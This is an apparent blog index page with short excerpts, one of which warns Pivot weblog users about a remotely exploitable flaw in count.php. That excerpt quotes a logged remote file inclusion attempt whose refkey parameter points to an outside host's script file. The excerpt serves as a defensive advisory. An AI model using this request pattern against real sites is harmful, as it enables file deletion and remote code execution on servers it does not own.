Aaaaaaannnnd.... we're back!

After much deliberation I’ve finally gotten around to upgrading my website to the latest version of the software, and while I was at it I decided to change the default appearance to something a little less busy.. which basically means that I played around with CSS until I happened across something that I like but which will probably cause everyone else to run screaming.

I know things are a little broken right now, I’m still sorting them out. I hope you like it.

The locations of the RSS and ATOM feeds have changed, so if you read this …

Read more...

Remotely exploitable vulnerability found in Pivot v1.40.6!

Attention all users of the Pivot weblog package! A remotely exploitable vulnerability was discovered in the /web/content/extensions/bbclone_tools/count.php file. This vulnerability can be used by an attacker to delete files from your web content directory, and if the register_globals PHP variable is set, it can be used to stage a remote file inclusion attack. One person (I'll blank their IP address) has already tried it on my website:

a.b.c.d - - [19/Mar/2009:17:19:22 -0400] "GET //extensions/bbclone_tools/count.php?refkey=http://www.infernodancevault.com//modules/tinycontent/admin/chmod.txt?? HTTP/1 …

Read more...

An open question for my readers.

While going through my server logs tonight I keep seeing logfile entries like this:

a.b.c.d - - [13/Jan/2008:22:59:49 -0500] "GET /pivot/archive/2007/11/16/serious_vulnerability_found_in HTTP/1.0" 404 321 "http://drwho.virtadpt.net/archive/2007/11/16/serious_vulnerability_found_in" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"

Someone's going to articles on my website that exist, but then they're clicking a link someplace in the article that's sending them to the same URL prepended with the string /pivot, and I can't figure out where or why they're causing …

Read more...